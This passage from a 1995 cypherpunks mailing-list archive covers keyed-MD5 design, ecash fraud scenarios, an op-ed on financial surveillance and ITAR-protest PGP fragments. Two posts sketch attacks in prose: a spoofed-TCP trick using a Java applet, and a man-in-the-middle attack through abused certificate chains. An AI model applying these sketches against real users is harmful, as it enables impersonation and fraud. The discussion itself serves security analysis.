whose blinding factors you chose.)



Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMJbM0vWZSllhfG25AQG1MgP/UhbGC2Afih+/hrQcjvc4lOQBAWXQ8lDL
HpMRI1002odcEQ3LX/Dy2H7+LwsnMQweVtQU3Q9Q8cVWOeSXSReoKAZinbjAvvfH
Hf7xKZcmgX4xBhRmOeLxH2/noGL5iRkjONuMfQUFE85Rkc3ilh7IQr+UC8sGLUY1
2p/tXgsFJbM=
=RzYl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 1 Nov 1995 09:43:29 +0800
To: "baldwin" (Robert W. Baldwin) <baldwin@rsa.com>
Subject: Re: Keyed-MD5, and HTTP-NG
In-Reply-To: <9509308151.AA815103202@snail.rsa.com>
Message-ID: <199511010004.TAA14640@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"baldwin" writes:
> Simon,
>         There are a few different ways to add key material to MD5 to
> make it suitable as a shared-secret authenticator function.  Some of these
> are less resistant to attacks than others.  For example, the keyed MD5
> mechanism that is part of the current IPsec specifications can be
> attacked using 2**60 chosen messages.  Fortunately, the IPsec specs
> also require that the shared MD5 key be changed every 2**32 messages,
> so this attack is unlikely to succeed.  Specifically, IPsec uses
> MD5 as follows:  X = MD5(key | keypad | Message), where "|" means
> concatenation and the "keypad" pads out the key to 512 bits.
> Basically, this function is the same as standard MD5 with a
> different initialization vector for the compression operation
> on the first block of the message.
>         RSA Labs recommends that a people use an authenticator like
> X = MD5(key1, MD5(key2, Message)).  This resists the chosen plaintext
> attacks that were published at the crypto conference in Spring 1995.

Pardon me. The amount of vitriol I am going to spew is probably
difficult for people to understand because most folks around here
weren't following the keyed MD5 discussions during the IPSEC work and
have no idea of the sort of crap the professional cryptographic
community put us through.

We spent months, and months, and months, and months, getting advice
from every cryptographer on the planet. Every conceivable combination
of pads, multiple keys, keys before the text, after, before and after,
etc., was discussed over and over and over again.

Finally, the folks at RSA and IBM both agreed that Hugo's scheme, the
one we were putting in to place, was the best possible one. (Thats the
one with the padded key.)

What the flying hell are you doing telling us now, and indeed not even
telling the IPSEC community but instead mumbling on cypherpunks, that
you guys were in possession of information BEFORE the entire
discussion in midsummer that indicated that your own advice was wrong?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 1 Nov 1995 09:49:27 +0800
To: tomw@cthulhu.engr.sgi.com
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199510311648.IAA05877@orac.engr.sgi.com>
Message-ID: <199511010026.TAA22659@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Weinstein writes:
> One problem with this scheme is that if multiple processes have
> /dev/random open you can block unexpectedly.  If I try to avoid blocking
> by first checking if entropy is available there's a race condition if
> another process reads from the device.  Is there another way to avoid
> blocking?

Yeah. Use non-blocking I/O. Its in every version of Unix I've touched
for over a decade.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Sat, 4 Nov 1995 04:02:55 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: ecash remailer
In-Reply-To: <199510311940.OAA31415@opine.cs.umass.edu>
Message-ID: <Pine.SUN.3.90.951031201550.9466A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Ahh yes, but but Ed would not spend those coins, he would use them to 
launder others peoples coins such that any person laundering coins thrugh
Ed may randombly get a coin, even Alice and Charlie! Whats the bank to do 
when they see the coins bein spent by a few hundred diferent people.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Tue, 31 Oct 1995, Futplex wrote:

> Jumping in hastily:
> 
> It seems to me that Ed faces a larger problem if the above scenario turns
> out to be a viable attack. Consider the following sequence: Alice and
> Charlie decide to get some (payee-anonymous) currency laundromat in hot 
> water. Alice (payer-anonymously) washes some coins at the laundromat.
> Con-man Charlie claims he didn't get paid for some fictional transaction with
> Alice. Alice complains to the bank, and the rest proceeds as before. The
> Alice-frames-Ed situation is functionally equivalent to the Bob-robs-Charlie
> situation from the bank's perspective.
> 
> -Futplex <futplex@pseudonym.com>
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Wed, 1 Nov 1995 10:07:46 +0800
To: Filtered Cypherpunks List <cypherpunks@toad.com
Subject: From Bill Frezza: Electronic Warfare
Message-ID: <Pine.SUN.3.91.951031203959.1181A-100000@amanda.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Sun, 29 Oct 1995 11:33:54 -0500
From: Bill Frezza <frezza@interramp.com>
To: sunder@escape.com
Subject: Can you post this?

Ray,

If you feel it is apporpriate, can you post the attached column to
cypherpunks? Since I am not a regular subscriber (I can't keep up with the
traffic) I thought it would be best to pass it by you first.

Thanks,

Bill Frezza
------------------------------------------------------------------------------
To: Cypherpunks@toad.com
Subject: Electronic Warfare
From: Bill Frezza (frezza@interramp.com)

Dear cyhperpunks,

Attached is a column that will appear on the op-ed page of tomorrow's
(10/30) Communications Week that was stimulated largely by a report filed
here by one of your members. I thought you would find it interesting and
thought provoking. I would like to thank and acknowledge whoever it was
that filed that report as well as encourage you all to keep me informed
about related political developments. (I just don't have the bandwidth to
follow the cyhperpunks list in its entirty.)  It is my hope to bring the
important issues you raise here to the attention of the industry and the
general public.

Regards,

Bill Frezza
Communications Week

ELECTRONIC WARFARE WAGES ON - AND YOU'RE THE TARGET

Although the flap over the Clinton administration's attempt to promote
escrowed-key encryption systems like Clipper has temporarily faded, the war
on electronic privacy continues.   As proceedings at the Fourth
International Conference on Money Laundering, Forfeiture, Asset Recovery,
Offshore Investments, the Pacific Rim, and International Financial Crimes
reveal, there has been no let up in our government's efforts to blockade
the cyber-frontier.

No, you won't learn much from the Wall Street Journal or the New York
Times, written by journalist-generalists who have no clue about where this
technology is heading.  The Feds have become so skilled at manipulating the
Old Media that stories about electronic privacy  invariably center on the
latest drug kingpin, pedophile, or domestic terrorist.  Attacking these
universally abhorred enemies of the people not only makes for good
headlines but keeps privacy advocates off balance as they are forced to
defend abstract rights using loathsome examples.  But if you tune in to the
Cypherpunks mailing list (majordomo@toad.com) you can get some excellent
first hand reports from the front.

In the relatively short period since the passage of the Bank Secrecy Act,
which, among other things, obliges banks to file Suspicious Activity
Reports on its customers, banks have become virtual deputies in the
treasury department's war on uncontrolled financial transactions.  And this
war is increasingly spilling into cyberspace.

The conference underscored the fact that, paradoxically, we are heading not
toward more specific and well defined transaction monitoring regulations,
but less.  How so?  The problem with making regulations precise is that
what software algorithms can define, other algorithms can evade.  Instead,
regulation by "raised eyebrow" is becoming the norm.  Federal bank
examiners have been given significant latitude to invoke draconian
penalties against uncooperative banks.  Because bank officers have few
due-process protections under this regime, it is no surprise that most of
them have become sniveling toadies.  The objective is to insure that banks
"voluntarily" introduce even more aggressive, unpredictable, and intrusive
monitoring than the government would ever dare mandate.  And to make sure
nothing slips through the cracks, human surveillance will be supplemented
with artificial-intelligence agents that can perform pattern analysis on
the aggregate flow of electronic transactions, flagging anything remotely
suspicious.  George Orwell would be impressed.

Lest you think that all of this is motivated solely by the drug war,  a
visit to the Treasury Department's Financial Crimes Enforcement Network
(FinCEN) homepage
(http://www.ustreas.gov/treasury/bureaus/fincen/facts.html) should open
your eyes.  This battle is not just about drug prohibition, a crime the
Treasury Department would have to invent if it didn't already exist.  The
real struggle is about the future of tax compliance, and it has you in its
sights.

A famous Revolutionary War era pamphleteer, writing under the pseudonym
"Brutus", perhaps said it best 200 years ago when he wrote - "The national
government through its taxing power will introduce itself into every corner
of the city and country.  It will take cognizance of the professional man
in his office or his study;  it will watch the merchant in his store;  it
will follow the mechanic to his shop and his work, and will haunt him in
his family and his bed;  it will be the constant companion to the
industrious farmer in his labour;  it will penetrate into the most obscure
cottage;  and finally it will light upon the head of every person in the
United States.  To all these different classes of people and in all these
circumstances on which it will attend them, the language in which it will
address them will be GIVE! GIVE!"

What Brutus didn't know and what the cypherpunks foresee is that one day
strong encryption will make it impossible to spy on our activities in
cyberspace.  Heightened conflict is inevitable.  Expect the rhetoric to get
a lot hotter as the government spinmeisters labor to keep us focused on
public enemies while frantically trying to keep its hand in every citizens
pocket and its eyes on every bankbook.

# # #
COPYRIGHT CMP PUBLICATIONS 1995

Bill Frezza is president at Wireless Computing Associates and co-founder of
the online forum DigitaLiberty.  The opinions expresses are his own. Frezza
can be reached at frezza@interramp.com.

 ------------------------------------
| Wireless Computing Associates, Inc.
| 704 Stoney Hill Rd., Suite 155
| Yardley, PA 19067
| ph 215-321-0929, fax 215-321-0490
| urgent Email: frezza@radiomail.net
| bulk Email: frezza@interramp.com
 ------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 1 Nov 1995 10:17:46 +0800
To: perry@piermont.com
Subject: Re: Keyed-MD5, and HTTP-NG
In-Reply-To: <199511010004.TAA14640@jekyll.piermont.com>
Message-ID: <9511010201.AA01860@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Ooops...

Just gone off and read the papers again. The Keyed MD5 proposal currently described 
in one of the drafts is indeed one of those that was suggested in the cryptobytes 
article. I remember reading another calling itself "Keyed MD5" at the time of the 
rumpus Perry refered to.

The response that had been communicated back was that the IP sec work was going to 
standard anyway despite the objections. The suggestion which had started people off 
was that of MAC_a(x) = MD5(a.x.a). Nobody ever mentioned that IP sec had changed the 
construction (which is a good thing).

The point still stands however that there will have to be more than one algorithm 
supported and that HTTP-NG cannot assume that a particular algorithm or construction 
will be used. Keyed-MD5 is still an MD5 variant, there are good reasons to think that 
a keyed digest could be constructed which would be faster than a hash function.  

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 1 Nov 1995 10:28:30 +0800
To: cypherpunks@toad.com
Subject: Re: Please send cash
In-Reply-To: <9510312359.AA21087@all.net>
Message-ID: <9511010212.AA30561@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain


> While HotJava prevents applets from actively opening connections that
> violate the user-selected security policy, it allows an applet to accept
> connections from anywhere.  At this point, an applet only has to use any one
> of a number of channels to communicate where it is, and have the remote end
> do the active open.

What if I start a Java applet then send it a faked TCP/IP packet from another 
host? Can I hotwire an outgoing connection that appears to be from the victim 
host?

TCP/IP connections are not really all that directed. It is only the startup 
phase that is trully directed - someone has to start a conversation.

Planned sequence of events :

Mallet:
	Send out Java applet to Alice
	Send Bob a connection request packet on port 22
	Alice's Java applet is accepting connections.
	Send Alice a "request" packet claiming to come from port 22
	Should now have an outgoing connection.

???? I'm not a TCP/IP hacker (much). I'll ask our guru tommorow after we
are done with the NSA.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 1 Nov 1995 13:34:48 +0800
To: Dave Del Torto <ddt@digicash.com>
Subject: Re: W3 Self-Regulation?
In-Reply-To: <v03003912acbc72d1d4cf@[129.46.82.80]>
Message-ID: <Pine.SOL.3.91.951031205913.1396A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Oct 1995, Dave Del Torto wrote:

> [Where's Tipper when you need her? Answer:]

Hey! Lay off the divine Ms. G!

There's actually a big difference between labelling and censorship, 
though there's always the danger that once material has been labelled, 
Ralph Reed and his merry gang of cross burners will try to ban 
information bearing certain labels (the ol' gateway effect).

Of course, if the labeling information isn't signed, the it's useless. 
Oh, and if people vote on labels, you really, really need secret voting 
protocols; this information can be very sensitive if it can be tied back 
to the voters.

Simon
p.s.
 What if instead of approving or banning drugs, the FDA instead just 
issued labels, and left the choices to the customer and his or her 
insurance agency...

---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1)   ((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 1 Nov 1995 10:48:37 +0800
To: Hal <cypherpunks@toad.com
Subject: Re: CJR returned to sender
In-Reply-To: <199511010030.QAA09462@jobe.shell.portal.com>
Message-ID: <9511010221.AA01918@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner <sjb@universe.digex.net> writes:
>Dan Weinstein writes:
[unknown writes:]
>>>If anyone from MIT is reading this, it would be a real public service to 
>>>put on a web site (a) what the system used for the release of PGP is 
>>>exactly and (b) what assurances (oral, written, names & dates) was 
>>>received from State/Commerce that this was legal.
>>
>>You are assuming that because the government has chosen not to
>>prosecute MIT that they will not prosecute anyone else.  This is a
>>faulty assumption, laws are not invalidated if they are not enforced,
>>only if they are repealed or overturned.

>From what I have been told the NSA have never squeaked about the PGP server.
No correspondence whatsoever. But then again MIT has some pretty meaty
lawyers and never gives in to nuisance suits (they recently paid $2 million
to fight one). Besides I doubt the head of the CIA would be too happy with
the NSA if they went of beating up MIT. NCSA got pretty well beaten up however.

I think that at the moment they are far to wound up trying to hope the Zimmerman 
case goes away that they want to start another.

Its simply a bunch of beureacrats looking to keep their jobs after the war. Each 
time someone in congress yelps more money for "defence" you get more of those 
people. They now have to justify their pay packet. Before too long someone will 
clue in on a way to save 150 million a year. Actually they have done already but 
it takes a while for things to happen. What do you expect? The US constitution 
is not designed to create an efficient government, its meant to stop them 
getting much done.

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 1 Nov 1995 11:08:23 +0800
To: hallam@w3.org
Subject: Re: Please send cash
In-Reply-To: <9511010212.AA30561@zorch.w3.org>
Message-ID: <9511010226.AA02469@all.net>
MIME-Version: 1.0
Content-Type: text


> > While HotJava prevents applets from actively opening connections that
> > violate the user-selected security policy, it allows an applet to accept
> > connections from anywhere.  At this point, an applet only has to use any one
> > of a number of channels to communicate where it is, and have the remote end
> > do the active open.
> 
> What if I start a Java applet then send it a faked TCP/IP packet from another 
> host? Can I hotwire an outgoing connection that appears to be from the victim 
> host?

I think so.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 2 Nov 1995 18:33:19 +0800
To: cypherpunks@toad.com
Subject: Re: From Bill Frezza: Electronic Warfare
In-Reply-To: <199511010500.GAA03716@utopia.hacktic.nl>
Message-ID: <Pine.ULT.3.91.951031212735.8947A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 1 Nov 1995, Anonymous wrote:

> On Tue, 31 Oct 1995, Bill Frezza <frezza@interramp.com> wrote:
> 
> > Attached is a column that will appear on the op-ed page of tomorrow's
> > (10/30) Communications Week that was stimulated largely by a report filed
> 
> > Cypherpunks mailing list (majordomo@toad.com) you can get some excellent
> 
> list address is cypherpunks@toad.com
> list manager is majordomo@toad.com
> sending list mail to majordomo will not work

Sending mail without valid commands to majordomo will give you a help
file.  You don't *really* want the actual list address to be published
everywhere, do you? I think the noise/signal ratio is high enough already.

cypherpunks-request@toad.com would have been better, because it gives a 
more specific help file. URL would have been better still. But not the 
address.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 1 Nov 1995 14:29:00 +0800
To: cypherpunks@toad.com
Subject: Digicash tagged with payee?
Message-ID: <199511010604.WAA25344@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I have heard it claimed that when you make a payment with Digicash ecash,
the identity of the payee is encoded or embedded into the cash somehow.
This is an anti-theft measure (among other things, perhaps).  The bank
checks that the embedded identity in deposited cash matches the account
name which is doing the deposit.

My question is, how could this be done?  How can the payor, at payment
time, without communicating with the bank, embed a payee name
irreversibly into the cash so that a thief cannot strip it out and
replace it with his own name?

Is it perhaps a matter of encrypting the cash with the public key of
the payee?  If so, how does the payor get that?  Is it provided by the
payee during the TCP connection?  Is it authenticated with a
certificate, perhaps signed by some Digicash root key?

Off-list there has been some discussion about the role of certificates in
ecash, and in cash systems in general.  It would be interesting to know
if this anti-theft provision of Digicash is actually provided by means of
a certificate.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Wed, 1 Nov 1995 12:19:09 +0800
To: cypherpunks@toad.com
Subject: If I WANNA I'M GONNA
Message-ID: <199510312105.VAA11591@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I see all the traffic analysis arguments.

They are silly. If someone wants something, they will get it.

Simple.

The only question is how long it will take.

Not if!

Just how long!

Love Always,

Carol Anne
ps Wanna argue with a loaded gun at your face? SEE!
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Thu, 2 Nov 1995 18:43:31 +0800
To: cypherpunks@toad.com
Subject: Happy Halloween!
Message-ID: <199510312107.VAA11674@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


May you find happiness on the 
Yellow Brick Road of Cryptography.
(costuming of the highest art)

Love Always,

Carol Anne
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Wed, 1 Nov 1995 12:33:11 +0800
To: futplex@pseudonym.com
Subject: Re: ecash remailer
Message-ID: <199511010417.WAA10507@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


>> Wouldn't the ability to have the bank prove that the coins were 'cashed'
>> make this all null and void? The only way this would work would be if
>> Charlie is willing to completely forego cashing in the coins, *ever*. Should
>> he cash them in later, Ed would seem to have grounds for suspicion/complain.
>
>In the scenario I suggested, Charlie never gets coins from anyone. He just
>(falsely) claims that he was supposed to have received some from Alice.

My test copy of the Ecash software logs what coins were spent - wouldn't
something like that constitute evidence that any claim was made? Failing
that, wouldn't Ed be able to tell the bank 'these coins were
misplaced/lost/damaged. please cancel them', and then re-issue any payment due?

*If* Alice really paid Ed, then he would have evidence of such, whether
Charlie's claim is valid or not. With the cash in hand, Ed should reasonably
be able to re-issue them, just as one could put a stop-payment on a check
and re-issue.

Or am I completely missing something here? (always a possibility, I suppose :-)

Dave
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 1 Nov 1995 14:50:02 +0800
To: cypherpunks@toad.com
Subject: "Dr." Fred
Message-ID: <199511010627.WAA28538@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


The most charitable explanation for "Dr." Fred is that
he's degenerated into the professional equivalent of
those pathetic aging former chess masters who try to 
eek out a subsistence living by charging five bucks a 
game. People often play with them out of sympathy, or 
for the novelty of having lost to a past great. It's 
part of the chess culture, and it's basically harmless 
and sort of quaint.

The difference, of course, is that its almost impossible 
to have sympathy for Dr. Fred. His hussle is for a hell 
of a lot more than subsistence. He was also never actually 
a master of his field, a fact that becomes increasingly 
obvious as our exposure to him goes on. Now he's reduced
himself to trying to collect someone else's winnings.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mr. Boffo" <mixmaster@vishnu.alias.net>
Date: Sat, 30 Sep 95 22:49:38 PDT
To: cypherpunks@toad.com
Subject: Re: RSA's comments on RC4 weak keys
In-Reply-To: <9508298124.AA812423895@snail.rsa.com>
Message-ID: <199510010537.AAA09694@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


Robert W. Baldwin <baldwin@RSA.COM> wrote:

> Here is our response to the excellent work that Andrew Roos has been
> doing on RC4.  I am glad that people are looking at RC4 critically.

Oh really?  A year ago you didn't want anyone looking at RC4 at all!

But since you now seem to be for open review, we'd be happy to
cryptanalyze RC2 for ya also.  :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 1 Oct 95 01:12:58 PDT
To: cypherpunks@toad.com
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <199510010812.BAA11516@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>What you have described is the classic 'man in the middle' attack.
>Netscape claims that SSL V.3 is immune to the MITM attack in
>appendix D.4 of the SSL V.3 spec. 
>
>You will need to get the 'filter' (MITM) key signed by Verisign.
>Or hack Verisign's server-key-signing key.

Or hack the Web of Trust used to verify the server's identity.
It _is_ still a Web of Trust even if it's a fascistly-hierarchical tree;
as long as it's possible to get a certificate without heavy contractual
obligations, you can hack it, since the software has no way to check,
now that Netscape is being nice and open and allowing non-Verisign certs.
Remember that anybody can be a CA, and keys can be signed by multiple CAs.

        Verisign Business CA signs Carol's Certification Consultants' key.
        Carol signs Bob's Better Browser Business's key.  
        Bob runs a server, selling really cool web tools.
        Verisign Business CA signs Moriarty's Mallet Makers' key.
        Moriarty signs Mr. X's personna key (trust us.)
        Mr. X makes a key called Bob's Better Browser Business,
        looking suspiciously like the real thing, only it's
        signed by M
. X, and nobody bothered telling Bob about it.

        Alice, using Netscape, encounter's http://www.Bob'sBetterBrowser.com/,
        and decides to order a Better Browser.  She gets Bob's public key
        and X.509 certificates by pressing a button, and receives a key
        and a pile of certs.  Since it's not a secure session yet, is Mr. X
        intercepting them and sending her _his_ key and cert for "Bob" and his
        personna key with cert from Moriarty and his key and cert from Verisign?
        
        So Mr. X rips off Alice and/or Bob somewhere here, and Alice decides
to sue
        Bob, who says "Hey, that's not my key, see my real set of certs",
        so they go off after Mr. X, who they can't find, and then go after
        Moriarty, who says "Hey, it's just a personna certificate; all I
        guaranteed was that I didn't sign more than one with the same name
on it",
        which in fact appears to be true, and while after one case you can't 
        be sure that there really wasn't a Mr. X somewhere, if three or four
        people start walking in saying Mr. X ripped them off using a key
        that Moriarty signed, maybe somebody'll think it's a movement...

And remember that if you can finesse a signature, you can fake a Diffie-Hellman
session with authenticated keyparts into tolerating your MITM attack, because
you can convince Alice's browser into accepting the fake key for Bob,
and as far as Bob knows, Alice is just another web-client that he doesn't
know from Adam.

Now, X.509 certs don't limit themselves to hierarchical or Web use, and most
advice on using them recommends limiting the depth of a tree/web that you're
willing to trust.  Unfortunately, X.509 certs don't even have a comment field,
much less a standardized "how much do you trust this person you're signing"
field,
though I suppose you can cram a bit into the X.400/500-style name formats.

So if people want to really trust their digital signature system to prevent
forgeries, then either there's got to be a law demanding lots of government-
approved is-a-person nationalized ID card Internet Driver's License stuff, 
or else there's a market need for companies providing heavy-duty contractual 
backing for their key signatures (e.g. "In return for us signing your CA key 
with our high-trust CA key, you agree to accept $XM of liability for any misuse
of keys you sign with it and to force anybody whose key you sign to also sign
a contract like this one").  Probably a need for some standards to go with it.

There's also a need for browsers and any associated certificate checkers to
provide good user interfaces (so the _user_ can read the signature chain)
and good tools to help the user decide what to trust.  At minimum, the user
interface probably should support things like different required amounts of
trust for different categories of communication, e.g. business vs. personal
letters vs. politics vs. smuggling.


[This whole posting has been very annoying to write; I've just gone and
argued that you can munge an X.509 hierarchy back into the Web of Trust
and avoid the special-case treatment of Very Important CAs by just signing
the top nodes of a hierarchy yourself and treating them like any other
web-of-trust chain, and been thanking Netscape for allowing us to use
open protocols instead of depending on Big Organizational Infrastructures
that are run by the CON, and now I find myself posting a counter-example
that says sometimes you have to be very careful and/or reinvent Bigness
to avoid getting ripped off.  But, hey, while it's not a demonstated hack,
it's at least the theory for pulling one off, so even if it doesn't get
me a T-shirt, at least it wins me a GIF of one :-) ]
        
        
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 30 Sep 95 22:34:11 PDT
To: cypherpunks@toad.com
Subject: T-shirt on French TV
Message-ID: <9510010533.AA06669@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Timing is everything...

I happened to be flipping the channels while on the TV in my hotel room
Friday evening between 8 and 8:30 when I saw someone wearing the UK crypto
shirt on a talk show on French TV3.  I know no French.  A guy was standing
up wearing the shirt, turning around, holding it out for the camera, etc.
Someone sitting down was talking about it to the moderator -- I heard
words like cryptographique a few times.  When the speaker pointed to the
"may be illegal in France" part, the guy took the shirt off and the crowd
laughed.

The segment was about 10 minutes.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 30 Sep 95 23:17:30 PDT
To: cypherpunks@toad.com
Subject: Re: SAIC bought InterNic, but who is SAIC?  A spook contractor!
Message-ID: <9510010616.AA06860@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


One of the most interesting things SAIC does is run places that
monitor seismic events.  S.E.'s, by the way, are things that might be
earthquakes but could be A-bomb tests.

SAIC ran the Center for Seismic Studies in Arlington, VA.  Rick Adams,
co-founder of UUnet, made one of their machines, seismo, the UUCP hub of the
world for a couple of years.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Sat, 30 Sep 95 18:30:13 PDT
To: cypherpunks@toad.com
Subject: Re: Auto-signing
In-Reply-To: <199509302209.PAA03217@infinity.c2.org>
Message-ID: <199510010130.CAA07315@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


gmixo <gmixo@alpha.c2.org> wrote:

> would someone please send me information about any autosigning
> services.... like the gratis auto-signing.... and others like it....
> thanks

Look at http://www.hks.net/

I don't know of any others. although the moderator of comp.os.linux.announce
has a policy of PGP-signing all approved posts as a method of combatting
spam.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Flame Remailer <remailer@flame.alias.net>
Date: Sat, 30 Sep 95 18:31:10 PDT
To: cypherpunks@toad.com
Subject: Linux RSA Library (fwd)
Message-ID: <199510010131.CAA07331@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


From: Jim Kinder <jkinder@nat.com>
Newsgroups: comp.os.linux.announce
Subject: RSA Encryption Utilities.
Followup-To: comp.os.linux.development.apps
Date: Sat, 30 Sep 95 14:28:37 GMT
Organization: Network Application Technology
Lines: 39
Approved: linux-announce@news.ornl.gov (Lars Wirzenius)
Message-ID: <cola-liw-812471317-27882-1@oravannahka.helsinki.fi>
NNTP-Posting-Host: kruuna.helsinki.fi
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit

-----BEGIN PGP SIGNED MESSAGE-----

I have a set of Encryption Utilities for Linux

cyrpt - Unix sytle crypt(1) command using homebrew alogorithm

rcrypt - Beter version of crypt

primegen - Unlimited size prime number generator

rsacrypt - Unlimited key size RSA encryption system.

rsadecrypt - Decryption for rsacrypt

